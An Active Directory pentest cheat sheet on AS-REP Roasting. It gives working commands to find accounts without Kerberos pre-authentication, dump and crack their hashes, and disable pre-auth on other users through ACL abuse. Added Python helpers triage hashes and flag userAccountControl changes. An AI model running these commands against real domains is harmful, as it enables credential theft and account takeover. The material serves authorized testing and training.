AS-REP Roasting

Although rare, you will occasionally find a user account that does not require Kerberos Pre-Authentication.

If you discover users with Pre-Auth disabled, you can grab their hashes, crack them, and then request tickets if you have the privileges to access particular services.

Steps to AS-REP Roast

Step 1 - Discover AS-REP Roastable Users

  • From Powershell

# PowerView_dev
Get-DomainUser -PreAuthNotRequired -Verbose | select samaccountname

# AD Module
Get-ADUser -Filter {DoesNotRequirePreauth -eq $true} -Properties DoesNotRequirePreAuth | select samaccountname

Step 2 - Grabbing the User Hashes

  • From Powershell

# ASREPRoast.ps1
. .\ASREPRoast.ps1
Get-ASREPHash -UserName VPN403User

# rubeus.exe
.\Rubeus.exe asreproast

# ASREPRoast.ps1
Invoke-ASREPRoast | fl

  • Linux

# Impacket
python GetNPUsers.py <user>@<domain> -usersfile <userfile>

# Crackmapexec
crackmapexec ldap <ip> -u <user> -p <pass> --asreproast ASREPROAST

# Kerbrute
./kerbrute --dc <ip> -d <domain> userenum <userfile> [--downgrade]

Step 3 - Cracking the Hashes

  • Note: make sure the hash ETYPE is 23 and not 18, otherwise Hashcat cannot crack it. Also make sure the 23 appears in the hash as shown below; if it is missing you may have to add it manually before cracking:

'$krb5asrep$23$<user>@<domain>:d0ed768218535536a...'

  • If you used kerbrute, you can use the --downgrade option to obtain the ETYPE 23 hash.

# Hashcat
hashcat -m 18200 hashfile.txt rockyou.txt
# or john
john hashfile.txt -wordlist=rockyou.txt
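The ETYPE note above is easy to get wrong by hand when a tool emits many lines, so the following is an added Python example (not part of the original page or of any of the tools it lists) that parses each `$krb5asrep$` line, reports its ETYPE, inserts the missing `23$` field when a line came out in the ETYPE-less layout, and sorts lines into "ready for mode 18200" and "not RC4". The sample lines are constructed placeholders that copy only the field layout of a mode-18200 hash (the hex material is meaningless), the ETYPE-18 sample reuses that same layout purely to exercise the ETYPE check, and the assumption that a line without an ETYPE field is an RC4 (23) reply is exactly the manual fix the note describes, so only apply it to hashes you know were requested with RC4.

```python
import re

# Constructed sample hash lines (not real captures): only the field layout
# matters, the hex material is placeholder data.
SAMPLE_HASHES = [
    # ETYPE field present: the layout hashcat mode 18200 expects
    "$krb5asrep$23$VPN403User@CORP.LOCAL:3e156ada591263b8aab0965f5aebd837$007497cb51b6c8",
    # ETYPE field missing: mode 18200 rejects this until the 23$ is added
    "$krb5asrep$svc_backup@CORP.LOCAL:aa11bb22cc33dd44ee55ff6677889900$0011223344556677",
    # Constructed ETYPE-18 (AES256) line in the same layout: not RC4, so mode 18200 cannot crack it
    "$krb5asrep$18$jsmith@CORP.LOCAL:deadbeef00112233445566778899aabb$ccddeeff00112233",
    # A Kerberoast (TGS) hash: wrong hash family for this step entirely
    "$krb5tgs$23$*svc_sql$CORP.LOCAL$MSSQLSvc/db01*$d0ed768218535536a$00112233",
]

# Only the RC4-HMAC (ETYPE 23) AS-REP layout is handled by hashcat mode 18200.
HASHCAT_MODE_BY_ETYPE = {23: 18200}

# $krb5asrep$[<etype>$]<user>@<realm>:<checksum>$<encrypted-data>
ASREP_RE = re.compile(
    r"^\$krb5asrep\$(?:(?P<etype>\d+)\$)?(?P<principal>[^:]+):"
    r"(?P<checksum>[0-9a-fA-F]+)\$(?P<edata>[0-9a-fA-F]+)$"
)


def parse_asrep_hash(line):
    """Split an AS-REP hash into its fields; etype is None when the field is absent.
    Returns None for anything that is not a $krb5asrep$ line."""
    m = ASREP_RE.match(line.strip())
    if not m:
        return None
    etype = int(m.group("etype")) if m.group("etype") else None
    return {
        "etype": etype,
        "principal": m.group("principal"),
        "checksum": m.group("checksum"),
        "edata": m.group("edata"),
    }


def normalize_for_hashcat(line, assumed_etype=23):
    """Rebuild the line with an explicit ETYPE field so mode 18200 accepts it.
    A missing field is ASSUMED to mean ETYPE 23 (the manual fix the note describes).
    Returns (normalized_line, hashcat_mode_or_None, reason)."""
    parsed = parse_asrep_hash(line)
    if parsed is None:
        return line, None, "not a $krb5asrep$ hash"
    etype = parsed["etype"] if parsed["etype"] is not None else assumed_etype
    fixed = f"$krb5asrep${etype}${parsed['principal']}:{parsed['checksum']}${parsed['edata']}"
    mode = HASHCAT_MODE_BY_ETYPE.get(etype)
    reason = "ok" if mode else f"etype {etype} is not RC4 (23); mode 18200 will not crack it"
    return fixed, mode, reason


def triage(lines):
    """Group hash lines by the hashcat mode they are ready for.
    Keys: 18200 for crackable RC4 lines, 'unsupported' for everything else."""
    buckets = {18200: [], "unsupported": []}
    for line in lines:
        fixed, mode, reason = normalize_for_hashcat(line)
        if mode:
            buckets[mode].append(fixed)
        else:
            buckets["unsupported"].append((line, reason))
    return buckets


if __name__ == "__main__":
    for mode, entries in triage(SAMPLE_HASHES).items():
        print(mode)
        for entry in entries:
            print("   ", entry)
```

Feed the `18200` bucket to `hashcat -m 18200`; anything in `unsupported` either needs a different mode or is not an AS-REP hash at all, which is the distinction the note above is warning about.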

If You Would Like to Disable Preauth on a User

  • This is useful when you hold modify permissions over other user objects.

# Find users you can modify
Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReferenceName -match "<group>"}

# Then disable PreAuth on the user (executing this again will re-enable PreAuth)
Set-DomainObject -Identity <user_to_change> -XOR @{useraccountcontrol=4194304} -Verbose

# Then check if the user PreAuth is now disabled
Get-DomainUser -PreAuthNotRequired -Verbose | select samaccountname
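The `-XOR @{useraccountcontrol=4194304}` call above works because 4194304 is the DONT_REQ_PREAUTH bit (0x400000) of userAccountControl, and XOR flips that one bit, which is also why running it twice re-enables Pre-Auth. The following is an added Python example (not from the page or from PowerView) that decodes the relevant bits, reproduces the toggle, and compares two snapshots of userAccountControl values to list accounts whose Pre-Auth requirement was switched off, which is the check a defender would run after seeing such a change. The flag values are Microsoft's documented userAccountControl bits; the user records are constructed sample data, and the hypothetical `snapshot_before` / `snapshot_after` lists stand in for whatever export you pull from the directory.

```python
# Subset of the documented userAccountControl bit flags
UAC_FLAGS = {
    0x000002: "ACCOUNTDISABLE",
    0x000200: "NORMAL_ACCOUNT",
    0x010000: "DONT_EXPIRE_PASSWORD",
    0x400000: "DONT_REQ_PREAUTH",  # 4194304 decimal, the value the -XOR call above uses
}
DONT_REQ_PREAUTH = 0x400000


def decode_uac(value):
    """Names of the known flags set in a userAccountControl value, lowest bit first."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def toggle_flag(value, flag=DONT_REQ_PREAUTH):
    """What -XOR does: flip the bit, so applying it twice restores the original value."""
    return value ^ flag


def find_preauth_disabled(users):
    """users: iterable of (samaccountname, userAccountControl int).
    Returns the names that currently have DONT_REQ_PREAUTH set."""
    return [name for name, uac in users if uac & DONT_REQ_PREAUTH]


def preauth_newly_disabled(before, after):
    """Compare two snapshots of (samaccountname, userAccountControl) records and
    return the names whose DONT_REQ_PREAUTH bit was clear before and is set now."""
    was_set = {name for name, uac in before if uac & DONT_REQ_PREAUTH}
    return [name for name, uac in after if uac & DONT_REQ_PREAUTH and name not in was_set]


# Constructed sample records (hypothetical accounts, not from a real domain)
snapshot_before = [
    ("VPN403User", 0x400200),   # NORMAL_ACCOUNT | DONT_REQ_PREAUTH: already roastable
    ("jsmith",     0x000200),   # NORMAL_ACCOUNT
    ("svc_backup", 0x010200),   # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD
    ("olduser",    0x000202),   # NORMAL_ACCOUNT | ACCOUNTDISABLE
]
# Same records after someone ran the -XOR toggle against svc_backup
snapshot_after = [
    (name, toggle_flag(uac) if name == "svc_backup" else uac)
    for name, uac in snapshot_before
]

if __name__ == "__main__":
    for name, uac in snapshot_after:
        print(f"{name:12} {uac:#08x} {decode_uac(uac)}")
    print("Pre-Auth disabled now:", find_preauth_disabled(snapshot_after))
    print("Newly disabled since last snapshot:", preauth_newly_disabled(snapshot_before, snapshot_after))
```

Running the toggle a second time on `svc_backup` gives back 0x10200, matching the comment above that executing `Set-DomainObject -XOR` again re-enables Pre-Auth; the snapshot comparison is the piece that tells you which account actually changed rather than which ones were roastable all along.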
